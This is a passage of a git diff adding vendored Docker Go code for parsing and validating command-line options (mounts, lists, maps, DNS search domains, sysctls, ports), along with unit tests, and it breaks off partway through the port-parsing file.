0000000000..ce6383ddca --- /dev/null +++ b/vendor/github.com/docker/docker/opts/mount.go @@ -0,0 +1,171 @@ +package opts + +import ( + "encoding/csv" + "fmt" + "os" + "strconv" + "strings" + + mounttypes "github.com/docker/docker/api/types/mount" + "github.com/docker/go-units" +) + +// MountOpt is a Value type for parsing mounts +type MountOpt struct { + values []mounttypes.Mount +} + +// Set a new mount value +func (m *MountOpt) Set(value string) error { + csvReader := csv.NewReader(strings.NewReader(value)) + fields, err := csvReader.Read() + if err != nil { + return err + } + + mount := mounttypes.Mount{} + + volumeOptions := func() *mounttypes.VolumeOptions { + if mount.VolumeOptions == nil { + mount.VolumeOptions = &mounttypes.VolumeOptions{ + Labels: make(map[string]string), + } + } + if mount.VolumeOptions.DriverConfig == nil { + mount.VolumeOptions.DriverConfig = &mounttypes.Driver{} + } + return mount.VolumeOptions + } + + bindOptions := func() *mounttypes.BindOptions { + if mount.BindOptions == nil { + mount.BindOptions = new(mounttypes.BindOptions) + } + return mount.BindOptions + } + + tmpfsOptions := func() *mounttypes.TmpfsOptions { + if mount.TmpfsOptions == nil { + mount.TmpfsOptions = new(mounttypes.TmpfsOptions) + } + return mount.TmpfsOptions + } + + setValueOnMap := func(target map[string]string, value string) { + parts := strings.SplitN(value, "=", 2) + if len(parts) == 1 { + target[value] = "" + } else { + target[parts[0]] = parts[1] + } + } + + mount.Type = mounttypes.TypeVolume // default to volume mounts + // Set writable as the default + for _, field := range fields { + parts := strings.SplitN(field, "=", 2) + key := strings.ToLower(parts[0]) + + if len(parts) == 1 { + switch key { + case "readonly", "ro": + mount.ReadOnly = true + continue + case "volume-nocopy": + volumeOptions().NoCopy = true + continue + } + } + + if len(parts) != 2 { + return fmt.Errorf("invalid field '%s' must be a key=value pair", field) + } + + value := parts[1] + switch key { + case "type": + mount.Type = mounttypes.Type(strings.ToLower(value)) + case "source", "src": + mount.Source = value + case "target", "dst", "destination": + mount.Target = value + case "readonly", "ro": + mount.ReadOnly, err = strconv.ParseBool(value) + if err != nil { + return fmt.Errorf("invalid value for %s: %s", key, value) + } + case "bind-propagation": + bindOptions().Propagation = mounttypes.Propagation(strings.ToLower(value)) + case "volume-nocopy": + volumeOptions().NoCopy, err = strconv.ParseBool(value) + if err != nil { + return fmt.Errorf("invalid value for populate: %s", value) + } + case "volume-label": + setValueOnMap(volumeOptions().Labels, value) + case "volume-driver": + volumeOptions().DriverConfig.Name = value + case "volume-opt": + if volumeOptions().DriverConfig.Options == nil { + volumeOptions().DriverConfig.Options = make(map[string]string) + } + setValueOnMap(volumeOptions().DriverConfig.Options, value) + case "tmpfs-size": + sizeBytes, err := units.RAMInBytes(value) + if err != nil { + return fmt.Errorf("invalid value for %s: %s", key, value) + } + tmpfsOptions().SizeBytes = sizeBytes + case "tmpfs-mode": + ui64, err := strconv.ParseUint(value, 8, 32) + if err != nil { + return fmt.Errorf("invalid value for %s: %s", key, value) + } + tmpfsOptions().Mode = os.FileMode(ui64) + default: + return fmt.Errorf("unexpected key '%s' in '%s'", key, field) + } + } + + if mount.Type == "" { + return fmt.Errorf("type is required") + } + + if mount.Target == "" { + return fmt.Errorf("target is required") + } + + if mount.VolumeOptions != nil && mount.Type != mounttypes.TypeVolume { + return fmt.Errorf("cannot mix 'volume-*' options with mount type '%s'", mount.Type) + } + if mount.BindOptions != nil && mount.Type != mounttypes.TypeBind { + return fmt.Errorf("cannot mix 'bind-*' options with mount type '%s'", mount.Type) + } + if mount.TmpfsOptions != nil && mount.Type != mounttypes.TypeTmpfs { + return fmt.Errorf("cannot mix 'tmpfs-*' options with mount type '%s'", mount.Type) + } + + m.values = append(m.values, mount) + return nil +} + +// Type returns the type of this option +func (m *MountOpt) Type() string { + return "mount" +} + +// String returns a string repr of this option +func (m *MountOpt) String() string { + mounts := []string{} + for _, mount := range m.values { + repr := fmt.Sprintf("%s %s %s", mount.Type, mount.Source, mount.Target) + mounts = append(mounts, repr) + } + return strings.Join(mounts, ", ") +} + +// Value returns the mounts +func (m *MountOpt) Value() []mounttypes.Mount { + return m.values +} diff --git a/vendor/github.com/docker/docker/opts/mount_test.go b/vendor/github.com/docker/docker/opts/mount_test.go new file mode 100644 index 0000000000..59606c38e2 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/mount_test.go @@ -0,0 +1,184 @@ +package opts + +import ( + "os" + "testing" + + mounttypes "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestMountOptString(t *testing.T) { + mount := MountOpt{ + values: []mounttypes.Mount{ + { + Type: mounttypes.TypeBind, + Source: "/home/path", + Target: "/target", + }, + { + Type: mounttypes.TypeVolume, + Source: "foo", + Target: "/target/foo", + }, + }, + } + expected := "bind /home/path /target, volume foo /target/foo" + assert.Equal(t, mount.String(), expected) +} + +func TestMountOptSetBindNoErrorBind(t *testing.T) { + for _, testcase := range []string{ + // tests several aliases that should have same result. + "type=bind,target=/target,source=/source", + "type=bind,src=/source,dst=/target", + "type=bind,source=/source,dst=/target", + "type=bind,src=/source,target=/target", + } { + var mount MountOpt + + assert.NilError(t, mount.Set(testcase)) + + mounts := mount.Value() + assert.Equal(t, len(mounts), 1) + assert.Equal(t, mounts[0], mounttypes.Mount{ + Type: mounttypes.TypeBind, + Source: "/source", + Target: "/target", + }) + } +} + +func TestMountOptSetVolumeNoError(t *testing.T) { + for _, testcase := range []string{ + // tests several aliases that should have same result. + "type=volume,target=/target,source=/source", + "type=volume,src=/source,dst=/target", + "type=volume,source=/source,dst=/target", + "type=volume,src=/source,target=/target", + } { + var mount MountOpt + + assert.NilError(t, mount.Set(testcase)) + + mounts := mount.Value() + assert.Equal(t, len(mounts), 1) + assert.Equal(t, mounts[0], mounttypes.Mount{ + Type: mounttypes.TypeVolume, + Source: "/source", + Target: "/target", + }) + } +} + +// TestMountOptDefaultType ensures that a mount without the type defaults to a +// volume mount. +func TestMountOptDefaultType(t *testing.T) { + var mount MountOpt + assert.NilError(t, mount.Set("target=/target,source=/foo")) + assert.Equal(t, mount.values[0].Type, mounttypes.TypeVolume) +} + +func TestMountOptSetErrorNoTarget(t *testing.T) { + var mount MountOpt + assert.Error(t, mount.Set("type=volume,source=/foo"), "target is required") +} + +func TestMountOptSetErrorInvalidKey(t *testing.T) { + var mount MountOpt + assert.Error(t, mount.Set("type=volume,bogus=foo"), "unexpected key 'bogus'") +} + +func TestMountOptSetErrorInvalidField(t *testing.T) { + var mount MountOpt + assert.Error(t, mount.Set("type=volume,bogus"), "invalid field 'bogus'") +} + +func TestMountOptSetErrorInvalidReadOnly(t *testing.T) { + var mount MountOpt + assert.Error(t, mount.Set("type=volume,readonly=no"), "invalid value for readonly: no") + assert.Error(t, mount.Set("type=volume,readonly=invalid"), "invalid value for readonly: invalid") +} + +func TestMountOptDefaultEnableReadOnly(t *testing.T) { + var m MountOpt + assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo")) + assert.Equal(t, m.values[0].ReadOnly, false) + + m = MountOpt{} + assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo,readonly")) + assert.Equal(t, m.values[0].ReadOnly, true) + + m = MountOpt{} + assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo,readonly=1")) + assert.Equal(t, m.values[0].ReadOnly, true) + + m = MountOpt{} + assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo,readonly=true")) + assert.Equal(t, m.values[0].ReadOnly, true) + + m = MountOpt{} + assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo,readonly=0")) + assert.Equal(t, m.values[0].ReadOnly, false) +} + +func TestMountOptVolumeNoCopy(t *testing.T) { + var m MountOpt + assert.NilError(t, m.Set("type=volume,target=/foo,volume-nocopy")) + assert.Equal(t, m.values[0].Source, "") + + m = MountOpt{} + assert.NilError(t, m.Set("type=volume,target=/foo,source=foo")) + assert.Equal(t, m.values[0].VolumeOptions == nil, true) + + m = MountOpt{} + assert.NilError(t, m.Set("type=volume,target=/foo,source=foo,volume-nocopy=true")) + assert.Equal(t, m.values[0].VolumeOptions != nil, true) + assert.Equal(t, m.values[0].VolumeOptions.NoCopy, true) + + m = MountOpt{} + assert.NilError(t, m.Set("type=volume,target=/foo,source=foo,volume-nocopy")) + assert.Equal(t, m.values[0].VolumeOptions != nil, true) + assert.Equal(t, m.values[0].VolumeOptions.NoCopy, true) + + m = MountOpt{} + assert.NilError(t, m.Set("type=volume,target=/foo,source=foo,volume-nocopy=1")) + assert.Equal(t, m.values[0].VolumeOptions != nil, true) + assert.Equal(t, m.values[0].VolumeOptions.NoCopy, true) +} + +func TestMountOptTypeConflict(t *testing.T) { + var m MountOpt + assert.Error(t, m.Set("type=bind,target=/foo,source=/foo,volume-nocopy=true"), "cannot mix") + assert.Error(t, m.Set("type=volume,target=/foo,source=/foo,bind-propagation=rprivate"), "cannot mix") +} + +func TestMountOptSetTmpfsNoError(t *testing.T) { + for _, testcase := range []string{ + // tests several aliases that should have same result. + "type=tmpfs,target=/target,tmpfs-size=1m,tmpfs-mode=0700", + "type=tmpfs,target=/target,tmpfs-size=1MB,tmpfs-mode=700", + } { + var mount MountOpt + + assert.NilError(t, mount.Set(testcase)) + + mounts := mount.Value() + assert.Equal(t, len(mounts), 1) + assert.DeepEqual(t, mounts[0], mounttypes.Mount{ + Type: mounttypes.TypeTmpfs, + Target: "/target", + TmpfsOptions: &mounttypes.TmpfsOptions{ + SizeBytes: 1024 * 1024, // not 1000 * 1000 + Mode: os.FileMode(0700), + }, + }) + } +} + +func TestMountOptSetTmpfsError(t *testing.T) { + var m MountOpt + assert.Error(t, m.Set("type=tmpfs,target=/foo,tmpfs-size=foo"), "invalid value for tmpfs-size") + assert.Error(t, m.Set("type=tmpfs,target=/foo,tmpfs-mode=foo"), "invalid value for tmpfs-mode") + assert.Error(t, m.Set("type=tmpfs"), "target is required") +} diff --git a/vendor/github.com/docker/docker/opts/opts.go b/vendor/github.com/docker/docker/opts/opts.go new file mode 100644 index 0000000000..ae851537ec --- /dev/null +++ b/vendor/github.com/docker/docker/opts/opts.go @@ -0,0 +1,360 @@ +package opts + +import ( + "fmt" + "math/big" + "net" + "regexp" + "strings" + + "github.com/docker/docker/api/types/filters" +) + +var ( + alphaRegexp = regexp.MustCompile(`[a-zA-Z]`) + domainRegexp = regexp.MustCompile(`^(:?(:?[a-zA-Z0-9]|(:?[a-zA-Z0-9][a-zA-Z0-9\-]*[a-zA-Z0-9]))(:?\.(:?[a-zA-Z0-9]|(:?[a-zA-Z0-9][a-zA-Z0-9\-]*[a-zA-Z0-9])))*)\.?\s*$`) +) + +// ListOpts holds a list of values and a validation function. +type ListOpts struct { + values *[]string + validator ValidatorFctType +} + +// NewListOpts creates a new ListOpts with the specified validator. +func NewListOpts(validator ValidatorFctType) ListOpts { + var values []string + return *NewListOptsRef(&values, validator) +} + +// NewListOptsRef creates a new ListOpts with the specified values and validator. +func NewListOptsRef(values *[]string, validator ValidatorFctType) *ListOpts { + return &ListOpts{ + values: values, + validator: validator, + } +} + +func (opts *ListOpts) String() string { + return fmt.Sprintf("%v", []string((*opts.values))) +} + +// Set validates if needed the input value and adds it to the +// internal slice. +func (opts *ListOpts) Set(value string) error { + if opts.validator != nil { + v, err := opts.validator(value) + if err != nil { + return err + } + value = v + } + (*opts.values) = append((*opts.values), value) + return nil +} + +// Delete removes the specified element from the slice. +func (opts *ListOpts) Delete(key string) { + for i, k := range *opts.values { + if k == key { + (*opts.values) = append((*opts.values)[:i], (*opts.values)[i+1:]...) + return + } + } +} + +// GetMap returns the content of values in a map in order to avoid +// duplicates. +func (opts *ListOpts) GetMap() map[string]struct{} { + ret := make(map[string]struct{}) + for _, k := range *opts.values { + ret[k] = struct{}{} + } + return ret +} + +// GetAll returns the values of slice. +func (opts *ListOpts) GetAll() []string { + return (*opts.values) +} + +// GetAllOrEmpty returns the values of the slice +// or an empty slice when there are no values. +func (opts *ListOpts) GetAllOrEmpty() []string { + v := *opts.values + if v == nil { + return make([]string, 0) + } + return v +} + +// Get checks the existence of the specified key. +func (opts *ListOpts) Get(key string) bool { + for _, k := range *opts.values { + if k == key { + return true + } + } + return false +} + +// Len returns the amount of element in the slice. +func (opts *ListOpts) Len() int { + return len((*opts.values)) +} + +// Type returns a string name for this Option type +func (opts *ListOpts) Type() string { + return "list" +} + +// NamedOption is an interface that list and map options +// with names implement. +type NamedOption interface { + Name() string +} + +// NamedListOpts is a ListOpts with a configuration name. +// This struct is useful to keep reference to the assigned +// field name in the internal configuration struct. +type NamedListOpts struct { + name string + ListOpts +} + +var _ NamedOption = &NamedListOpts{} + +// NewNamedListOptsRef creates a reference to a new NamedListOpts struct. +func NewNamedListOptsRef(name string, values *[]string, validator ValidatorFctType) *NamedListOpts { + return &NamedListOpts{ + name: name, + ListOpts: *NewListOptsRef(values, validator), + } +} + +// Name returns the name of the NamedListOpts in the configuration. +func (o *NamedListOpts) Name() string { + return o.name +} + +// MapOpts holds a map of values and a validation function. +type MapOpts struct { + values map[string]string + validator ValidatorFctType +} + +// Set validates if needed the input value and add it to the +// internal map, by splitting on '='. +func (opts *MapOpts) Set(value string) error { + if opts.validator != nil { + v, err := opts.validator(value) + if err != nil { + return err + } + value = v + } + vals := strings.SplitN(value, "=", 2) + if len(vals) == 1 { + (opts.values)[vals[0]] = "" + } else { + (opts.values)[vals[0]] = vals[1] + } + return nil +} + +// GetAll returns the values of MapOpts as a map. +func (opts *MapOpts) GetAll() map[string]string { + return opts.values +} + +func (opts *MapOpts) String() string { + return fmt.Sprintf("%v", map[string]string((opts.values))) +} + +// Type returns a string name for this Option type +func (opts *MapOpts) Type() string { + return "map" +} + +// NewMapOpts creates a new MapOpts with the specified map of values and a validator. +func NewMapOpts(values map[string]string, validator ValidatorFctType) *MapOpts { + if values == nil { + values = make(map[string]string) + } + return &MapOpts{ + values: values, + validator: validator, + } +} + +// NamedMapOpts is a MapOpts struct with a configuration name. +// This struct is useful to keep reference to the assigned +// field name in the internal configuration struct. +type NamedMapOpts struct { + name string + MapOpts +} + +var _ NamedOption = &NamedMapOpts{} + +// NewNamedMapOpts creates a reference to a new NamedMapOpts struct. +func NewNamedMapOpts(name string, values map[string]string, validator ValidatorFctType) *NamedMapOpts { + return &NamedMapOpts{ + name: name, + MapOpts: *NewMapOpts(values, validator), + } +} + +// Name returns the name of the NamedMapOpts in the configuration. +func (o *NamedMapOpts) Name() string { + return o.name +} + +// ValidatorFctType defines a validator function that returns a validated string and/or an error. +type ValidatorFctType func(val string) (string, error) + +// ValidatorFctListType defines a validator function that returns a validated list of string and/or an error +type ValidatorFctListType func(val string) ([]string, error) + +// ValidateIPAddress validates an Ip address. +func ValidateIPAddress(val string) (string, error) { + var ip = net.ParseIP(strings.TrimSpace(val)) + if ip != nil { + return ip.String(), nil + } + return "", fmt.Errorf("%s is not an ip address", val) +} + +// ValidateDNSSearch validates domain for resolvconf search configuration. +// A zero length domain is represented by a dot (.). +func ValidateDNSSearch(val string) (string, error) { + if val = strings.Trim(val, " "); val == "." { + return val, nil + } + return validateDomain(val) +} + +func validateDomain(val string) (string, error) { + if alphaRegexp.FindString(val) == "" { + return "", fmt.Errorf("%s is not a valid domain", val) + } + ns := domainRegexp.FindSubmatch([]byte(val)) + if len(ns) > 0 && len(ns[1]) < 255 { + return string(ns[1]), nil + } + return "", fmt.Errorf("%s is not a valid domain", val) +} + +// ValidateLabel validates that the specified string is a valid label, and returns it. +// Labels are in the form on key=value. +func ValidateLabel(val string) (string, error) { + if strings.Count(val, "=") < 1 { + return "", fmt.Errorf("bad attribute format: %s", val) + } + return val, nil +} + +// ValidateSysctl validates a sysctl and returns it. +func ValidateSysctl(val string) (string, error) { + validSysctlMap := map[string]bool{ + "kernel.msgmax": true, + "kernel.msgmnb": true, + "kernel.msgmni": true, + "kernel.sem": true, + "kernel.shmall": true, + "kernel.shmmax": true, + "kernel.shmmni": true, + "kernel.shm_rmid_forced": true, + } + validSysctlPrefixes := []string{ + "net.", + "fs.mqueue.", + } + arr := strings.Split(val, "=") + if len(arr) < 2 { + return "", fmt.Errorf("sysctl '%s' is not whitelisted", val) + } + if validSysctlMap[arr[0]] { + return val, nil + } + + for _, vp := range validSysctlPrefixes { + if strings.HasPrefix(arr[0], vp) { + return val, nil + } + } + return "", fmt.Errorf("sysctl '%s' is not whitelisted", val) +} + +// FilterOpt is a flag type for validating filters +type FilterOpt struct { + filter filters.Args +} + +// NewFilterOpt returns a new FilterOpt +func NewFilterOpt() FilterOpt { + return FilterOpt{filter: filters.NewArgs()} +} + +func (o *FilterOpt) String() string { + repr, err := filters.ToParam(o.filter) + if err != nil { + return "invalid filters" + } + return repr +} + +// Set sets the value of the opt by parsing the command line value +func (o *FilterOpt) Set(value string) error { + var err error + o.filter, err = filters.ParseFlag(value, o.filter) + return err +} + +// Type returns the option type +func (o *FilterOpt) Type() string { + return "filter" +} + +// Value returns the value of this option +func (o *FilterOpt) Value() filters.Args { + return o.filter +} + +// NanoCPUs is a type for fixed point fractional number. +type NanoCPUs int64 + +// String returns the string format of the number +func (c *NanoCPUs) String() string { + return big.NewRat(c.Value(), 1e9).FloatString(3) +} + +// Set sets the value of the NanoCPU by passing a string +func (c *NanoCPUs) Set(value string) error { + cpus, err := ParseCPUs(value) + *c = NanoCPUs(cpus) + return err +} + +// Type returns the type +func (c *NanoCPUs) Type() string { + return "decimal" +} + +// Value returns the value in int64 +func (c *NanoCPUs) Value() int64 { + return int64(*c) +} + +// ParseCPUs takes a string ratio and returns an integer value of nano cpus +func ParseCPUs(value string) (int64, error) { + cpu, ok := new(big.Rat).SetString(value) + if !ok { + return 0, fmt.Errorf("failed to parse %v as a rational number", value) + } + nano := cpu.Mul(cpu, big.NewRat(1e9, 1)) + if !nano.IsInt() { + return 0, fmt.Errorf("value is too precise") + } + return nano.Num().Int64(), nil +} diff --git a/vendor/github.com/docker/docker/opts/opts_test.go b/vendor/github.com/docker/docker/opts/opts_test.go new file mode 100644 index 0000000000..9f41e47864 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/opts_test.go @@ -0,0 +1,232 @@ +package opts + +import ( + "fmt" + "strings" + "testing" +) + +func TestValidateIPAddress(t *testing.T) { + if ret, err := ValidateIPAddress(`1.2.3.4`); err != nil || ret == "" { + t.Fatalf("ValidateIPAddress(`1.2.3.4`) got %s %s", ret, err) + } + + if ret, err := ValidateIPAddress(`127.0.0.1`); err != nil || ret == "" { + t.Fatalf("ValidateIPAddress(`127.0.0.1`) got %s %s", ret, err) + } + + if ret, err := ValidateIPAddress(`::1`); err != nil || ret == "" { + t.Fatalf("ValidateIPAddress(`::1`) got %s %s", ret, err) + } + + if ret, err := ValidateIPAddress(`127`); err == nil || ret != "" { + t.Fatalf("ValidateIPAddress(`127`) got %s %s", ret, err) + } + + if ret, err := ValidateIPAddress(`random invalid string`); err == nil || ret != "" { + t.Fatalf("ValidateIPAddress(`random invalid string`) got %s %s", ret, err) + } + +} + +func TestMapOpts(t *testing.T) { + tmpMap := make(map[string]string) + o := NewMapOpts(tmpMap, logOptsValidator) + o.Set("max-size=1") + if o.String() != "map[max-size:1]" { + t.Errorf("%s != [map[max-size:1]", o.String()) + } + + o.Set("max-file=2") + if len(tmpMap) != 2 { + t.Errorf("map length %d != 2", len(tmpMap)) + } + + if tmpMap["max-file"] != "2" { + t.Errorf("max-file = %s != 2", tmpMap["max-file"]) + } + + if tmpMap["max-size"] != "1" { + t.Errorf("max-size = %s != 1", tmpMap["max-size"]) + } + if o.Set("dummy-val=3") == nil { + t.Errorf("validator is not being called") + } +} + +func TestListOptsWithoutValidator(t *testing.T) { + o := NewListOpts(nil) + o.Set("foo") + if o.String() != "[foo]" { + t.Errorf("%s != [foo]", o.String()) + } + o.Set("bar") + if o.Len() != 2 { + t.Errorf("%d != 2", o.Len()) + } + o.Set("bar") + if o.Len() != 3 { + t.Errorf("%d != 3", o.Len()) + } + if !o.Get("bar") { + t.Error("o.Get(\"bar\") == false") + } + if o.Get("baz") { + t.Error("o.Get(\"baz\") == true") + } + o.Delete("foo") + if o.String() != "[bar bar]" { + t.Errorf("%s != [bar bar]", o.String()) + } + listOpts := o.GetAll() + if len(listOpts) != 2 || listOpts[0] != "bar" || listOpts[1] != "bar" { + t.Errorf("Expected [[bar bar]], got [%v]", listOpts) + } + mapListOpts := o.GetMap() + if len(mapListOpts) != 1 { + t.Errorf("Expected [map[bar:{}]], got [%v]", mapListOpts) + } + +} + +func TestListOptsWithValidator(t *testing.T) { + // Re-using logOptsvalidator (used by MapOpts) + o := NewListOpts(logOptsValidator) + o.Set("foo") + if o.String() != "[]" { + t.Errorf("%s != []", o.String()) + } + o.Set("foo=bar") + if o.String() != "[]" { + t.Errorf("%s != []", o.String()) + } + o.Set("max-file=2") + if o.Len() != 1 { + t.Errorf("%d != 1", o.Len()) + } + if !o.Get("max-file=2") { + t.Error("o.Get(\"max-file=2\") == false") + } + if o.Get("baz") { + t.Error("o.Get(\"baz\") == true") + } + o.Delete("max-file=2") + if o.String() != "[]" { + t.Errorf("%s != []", o.String()) + } +} + +func TestValidateDNSSearch(t *testing.T) { + valid := []string{ + `.`, + `a`, + `a.`, + `1.foo`, + `17.foo`, + `foo.bar`, + `foo.bar.baz`, + `foo.bar.`, + `foo.bar.baz`, + `foo1.bar2`, + `foo1.bar2.baz`, + `1foo.2bar.`, + `1foo.2bar.baz`, + `foo-1.bar-2`, + `foo-1.bar-2.baz`, + `foo-1.bar-2.`, + `foo-1.bar-2.baz`, + `1-foo.2-bar`, + `1-foo.2-bar.baz`, + `1-foo.2-bar.`, + `1-foo.2-bar.baz`, + } + + invalid := []string{ + ``, + ` `, + ` `, + `17`, + `17.`, + `.17`, + `17-.`, + `17-.foo`, + `.foo`, + `foo-.bar`, + `-foo.bar`, + `foo.bar-`, + `foo.bar-.baz`, + `foo.-bar`, + `foo.-bar.baz`, + `foo.bar.baz.this.should.fail.on.long.name.beause.it.is.longer.thanisshouldbethis.should.fail.on.long.name.beause.it.is.longer.thanisshouldbethis.should.fail.on.long.name.beause.it.is.longer.thanisshouldbethis.should.fail.on.long.name.beause.it.is.longer.thanisshouldbe`, + } + + for _, domain := range valid { + if ret, err := ValidateDNSSearch(domain); err != nil || ret == "" { + t.Fatalf("ValidateDNSSearch(`"+domain+"`) got %s %s", ret, err) + } + } + + for _, domain := range invalid { + if ret, err := ValidateDNSSearch(domain); err == nil || ret != "" { + t.Fatalf("ValidateDNSSearch(`"+domain+"`) got %s %s", ret, err) + } + } +} + +func TestValidateLabel(t *testing.T) { + if _, err := ValidateLabel("label"); err == nil || err.Error() != "bad attribute format: label" { + t.Fatalf("Expected an error [bad attribute format: label], go %v", err) + } + if actual, err := ValidateLabel("key1=value1"); err != nil || actual != "key1=value1" { + t.Fatalf("Expected [key1=value1], got [%v,%v]", actual, err) + } + // Validate it's working with more than one = + if actual, err := ValidateLabel("key1=value1=value2"); err != nil { + t.Fatalf("Expected [key1=value1=value2], got [%v,%v]", actual, err) + } + // Validate it's working with one more + if actual, err := ValidateLabel("key1=value1=value2=value3"); err != nil { + t.Fatalf("Expected [key1=value1=value2=value2], got [%v,%v]", actual, err) + } +} + +func logOptsValidator(val string) (string, error) { + allowedKeys := map[string]string{"max-size": "1", "max-file": "2"} + vals := strings.Split(val, "=") + if allowedKeys[vals[0]] != "" { + return val, nil + } + return "", fmt.Errorf("invalid key %s", vals[0]) +} + +func TestNamedListOpts(t *testing.T) { + var v []string + o := NewNamedListOptsRef("foo-name", &v, nil) + + o.Set("foo") + if o.String() != "[foo]" { + t.Errorf("%s != [foo]", o.String()) + } + if o.Name() != "foo-name" { + t.Errorf("%s != foo-name", o.Name()) + } + if len(v) != 1 { + t.Errorf("expected foo to be in the values, got %v", v) + } +} + +func TestNamedMapOpts(t *testing.T) { + tmpMap := make(map[string]string) + o := NewNamedMapOpts("max-name", tmpMap, nil) + + o.Set("max-size=1") + if o.String() != "map[max-size:1]" { + t.Errorf("%s != [map[max-size:1]", o.String()) + } + if o.Name() != "max-name" { + t.Errorf("%s != max-name", o.Name()) + } + if _, exist := tmpMap["max-size"]; !exist { + t.Errorf("expected map-size to be in the values, got %v", tmpMap) + } +} diff --git a/vendor/github.com/docker/docker/opts/opts_unix.go b/vendor/github.com/docker/docker/opts/opts_unix.go new file mode 100644 index 0000000000..f1ce844a8f --- /dev/null +++ b/vendor/github.com/docker/docker/opts/opts_unix.go @@ -0,0 +1,6 @@ +// +build !windows + +package opts + +// DefaultHTTPHost Default HTTP Host used if only port is provided to -H flag e.g. docker daemon -H tcp://:8080 +const DefaultHTTPHost = "localhost" diff --git a/vendor/github.com/docker/docker/opts/opts_windows.go b/vendor/github.com/docker/docker/opts/opts_windows.go new file mode 100644 index 0000000000..ebe40c969c --- /dev/null +++ b/vendor/github.com/docker/docker/opts/opts_windows.go @@ -0,0 +1,56 @@ +package opts + +// TODO Windows. Identify bug in GOLang 1.5.1+ and/or Windows Server 2016 TP5. +// @jhowardmsft, @swernli. +// +// On Windows, this mitigates a problem with the default options of running +// a docker client against a local docker daemon on TP5. +// +// What was found that if the default host is "localhost", even if the client +// (and daemon as this is local) is not physically on a network, and the DNS +// cache is flushed (ipconfig /flushdns), then the client will pause for +// exactly one second when connecting to the daemon for calls. For example +// using docker run windowsservercore cmd, the CLI will send a create followed +// by an attach. You see the delay between the attach finishing and the attach +// being seen by the daemon. +// +// Here's some daemon debug logs with additional debug spew put in. The +// AfterWriteJSON log is the very last thing the daemon does as part of the +// create call. The POST /attach is the second CLI call. Notice the second +// time gap. +// +// time="2015-11-06T13:38:37.259627400-08:00" level=debug msg="After createRootfs" +// time="2015-11-06T13:38:37.263626300-08:00" level=debug msg="After setHostConfig" +// time="2015-11-06T13:38:37.267631200-08:00" level=debug msg="before createContainerPl...." +// time="2015-11-06T13:38:37.271629500-08:00" level=debug msg=ToDiskLocking.... +// time="2015-11-06T13:38:37.275643200-08:00" level=debug msg="loggin event...." +// time="2015-11-06T13:38:37.277627600-08:00" level=debug msg="logged event...." +// time="2015-11-06T13:38:37.279631800-08:00" level=debug msg="In defer func" +// time="2015-11-06T13:38:37.282628100-08:00" level=debug msg="After daemon.create" +// time="2015-11-06T13:38:37.286651700-08:00" level=debug msg="return 2" +// time="2015-11-06T13:38:37.289629500-08:00" level=debug msg="Returned from daemon.ContainerCreate" +// time="2015-11-06T13:38:37.311629100-08:00" level=debug msg="After WriteJSON" +// ... 1 second gap here.... +// time="2015-11-06T13:38:38.317866200-08:00" level=debug msg="Calling POST /v1.22/containers/984758282b842f779e805664b2c95d563adc9a979c8a3973e68c807843ee4757/attach" +// time="2015-11-06T13:38:38.326882500-08:00" level=info msg="POST /v1.22/containers/984758282b842f779e805664b2c95d563adc9a979c8a3973e68c807843ee4757/attach?stderr=1&stdin=1&stdout=1&stream=1" +// +// We suspect this is either a bug introduced in GOLang 1.5.1, or that a change +// in GOLang 1.5.1 (from 1.4.3) is exposing a bug in Windows. In theory, +// the Windows networking stack is supposed to resolve "localhost" internally, +// without hitting DNS, or even reading the hosts file (which is why localhost +// is commented out in the hosts file on Windows). +// +// We have validated that working around this using the actual IPv4 localhost +// address does not cause the delay. +// +// This does not occur with the docker client built with 1.4.3 on the same +// Windows build, regardless of whether the daemon is built using 1.5.1 +// or 1.4.3. It does not occur on Linux. We also verified we see the same thing +// on a cross-compiled Windows binary (from Linux). +// +// Final note: This is a mitigation, not a 'real' fix. It is still susceptible +// to the delay if a user were to do 'docker run -H=tcp://localhost:2375...' +// explicitly. + +// DefaultHTTPHost Default HTTP Host used if only port is provided to -H flag e.g. docker daemon -H tcp://:8080 +const DefaultHTTPHost = "127.0.0.1" diff --git a/vendor/github.com/docker/docker/opts/port.go b/vendor/github.com/docker/docker/opts/port.go new file mode 100644 index 0000000000..020a5d1e1c --- /dev/null +++ b/vendor/github.com/docker/docker/opts/port.go @@ -0,0 +1,146 @@ +package opts + +import ( + "encoding/csv" + "fmt" + "regexp" + "strconv" + "strings" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/go-connections/nat" +) + +const ( + portOptTargetPort = "target" + portOptPublishedPort = "published" + portOptProtocol = "protocol" + portOptMode = "mode" +) + +// PortOpt represents a port config in swarm mode. +type PortOpt struct { + ports []swarm.PortConfig +} + +// Set a new port value +func (p *PortOpt) Set(value string) error { + longSyntax, err := regexp.MatchString(`\w+=\w+(,\w+=\w+)*`, value) + if err != nil { + return err + } + if longSyntax { + csvReader := csv.NewReader(strings.NewReader(value)) + fields, err := csvReader.Read() + if err != nil { + return err + } + + pConfig := swarm.PortConfig{} + for _, field := range fields { + parts := strings.SplitN(field, "=", 2) + if len(parts) != 2 { + return fmt.Errorf("invalid field %s", field) + } + + key := strings.ToLower(parts[0]) + value := strings.ToLower(parts[1]) + + switch key { + case portOptProtocol: + if value != string(swarm.PortConfigProtocolTCP) && value != string(swarm.PortConfigProtocolUDP) { + return fmt.Errorf("invalid protocol value %s", value) + } + + pConfig.Protocol = swarm.PortConfigProtocol(value) + case portOptMode: + if value != string(swarm.PortConfigPublishModeIngress) && value != string(swarm.PortConfigPublishModeHost) { + return fmt.Errorf("invalid publish mode value %s", value) + } + + pConfig.PublishMode = swarm.PortConfigPublishMode(value) + case portOptTargetPort: + tPort, err := strconv.ParseUint(value, 10, 16) + if err != nil { + return err + } + + pConfig.TargetPort = uint32(tPort) + case portOptPublishedPort: + pPort, err := strconv.ParseUint(value, 10, 16) + if err != nil { + return err + } + + pConfig.PublishedPort = uint32(pPort) + default: + return fmt.Errorf("invalid field key %s", key) + } + } + + if pConfig.TargetPort == 0 { + return fmt.Errorf("missing mandatory field %q", portOptTargetPort) + } + + if pConfig.PublishMode == "" { + pConfig.PublishMode = swarm.PortConfigPublishModeIngress + } + + if pConfig.Protocol 